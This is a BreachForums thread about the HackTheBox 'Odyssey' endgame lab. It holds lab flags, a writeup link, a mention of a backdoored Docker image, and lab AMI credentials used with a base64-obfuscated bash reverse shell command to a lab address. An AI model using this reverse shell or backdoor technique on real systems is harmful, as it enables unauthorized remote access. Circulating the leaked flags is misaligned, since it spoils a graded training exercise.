JOIN BREACHFORUMS TELEGRAM
Odyssey endgame
by monkeythefirst - Friday September 1, 2023 at 12:47 AM
Breached
Member
Posts: 33
Threads: 2
Joined: Nov 2023
Reputation: 0
#11
Nov 19, 2023, 11:37 AM
Hi everyone. I have a question, I saw that port 5000 (dockcer registry) is exposed on the .11 machine, I managed to push the image with a backdoor into the crontab. I was wondering is this the right way or am I wasting my time?
Reply
Red Team operator
MVP
Posts: 149
Threads: 17
Joined: Jun 2023
Reputation: 122

MVP
#12
Nov 20, 2023, 10:26 PM
(Nov 19, 2023, 11:37 AM)braun33 Wrote: Hi everyone. I have a question, I saw that port 5000 (dockcer registry) is exposed on the .11 machine, I managed to push the image with a backdoor into the crontab. I was wondering is this the right way or am I wasting my time?

it's not about docker at .21.11  look  after .21.11:3000
Reply
Breached
Member
Posts: 17
Threads: 1
Joined: Nov 2023
Reputation: 0
#13
Jan 05, 2024, 06:00 PM
(Nov 20, 2023, 10:26 PM)admin123 Wrote:
(Nov 19, 2023, 11:37 AM)braun33 Wrote: Hi everyone. I have a question, I saw that port 5000 (dockcer registry) is exposed on the .11 machine, I managed to push the image with a backdoor into the crontab. I was wondering is this the right way or am I wasting my time?

it's not about docker at .21.11  look  after .21.11:3000

any hints for .21.11:3000 ?
I saw a src in Julia with vuln. But it's seems that .21.11:3000 has another src - in nodejs.

and is it need to take root on .21.12 before that?
Reply
Breached
Member
Posts: 17
Threads: 1
Joined: Nov 2023
Reputation: 0
#14
Jan 06, 2024, 06:38 AM
(Jan 05, 2024, 06:00 PM)yivador274 Wrote:
(Nov 20, 2023, 10:26 PM)admin123 Wrote:
(Nov 19, 2023, 11:37 AM)braun33 Wrote: Hi everyone. I have a question, I saw that port 5000 (dockcer registry) is exposed on the .11 machine, I managed to push the image with a backdoor into the crontab. I was wondering is this the right way or am I wasting my time?

it's not about docker at .21.11  look  after .21.11:3000

any hints for .21.11:3000 ?
I saw a src in Julia with vuln. But it's seems that .21.11:3000 has another src - in nodejs.

and is it need to take root on .21.12 before that?
Nevermind. I did it.
Reply
Advanced User

Posts: 57
Threads: 2
Joined: Aug 2023
Reputation: 2
#15
Jan 14, 2024, 12:04 AM
This is writeup:
https://gatogamer1155.github.io/endgames/odyssey/
Flag to open: ODYSSEY{50LaR15_R8AC_ADM1n15tRAT10n}
Not work for me manual for 3rd flag. Need help.
Reply
Breached
Member
Posts: 9
Threads: 0
Joined: Dec 2023
Reputation: 0
#16
Feb 01, 2024, 05:23 PM
ODYSSEY{k4r3Ful_WI7h_pDf_FiL32}
ODYSSEY{Ded1CA7eD_rU57_5ERVeR}
Reply
Breached
Member
Posts: 48
Threads: 3
Joined: Feb 2024
Reputation: 1
#17
Mar 09, 2024, 09:38 AM
Hi everybody, i can not get 3-rd flag. I use proxy ligolo, command with shell not work:
Action: login
Username: aeolus
Secret: P7xJ6y6x

Action: command
Command: dialplan add extension test,1,system(echo\ YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIxLjEwLzQ0NDQgMD4mMSIK|base64\ -d|bash), into pwned replace   <-till this OK
{THIS COMMAND NOT WORK:}
Action: command
Command: originate local/test@pwned extension test@pwned
PLS any help. Thanks advance.
Reply


Possibly Related Threads…
Thread Author Replies Views Last Post
  [FREE] CPTS 12 FLAGS pulsebreaker 68 1,934 7 hours ago
Last Post: VictorPipeau
  [FREE] HackTheBox Dante - complete writeup written by Tamarisk Tamarisk 601 91,533 7 hours ago
Last Post: VictorPipeau
  [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired Tamarisk 371 92,797 8 hours ago
Last Post: phannguyenbaouy1
  [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags Techtom 21 2,614 11 hours ago
Last Post: popoler
  Hack the box Pro Labs, VIP, VIP+ 1 month free Method RedBlock 23 2,268 Yesterday, 02:10 PM
Last Post: kkkato

Forum Jump:


 Users browsing this forum: 1 Guest(s)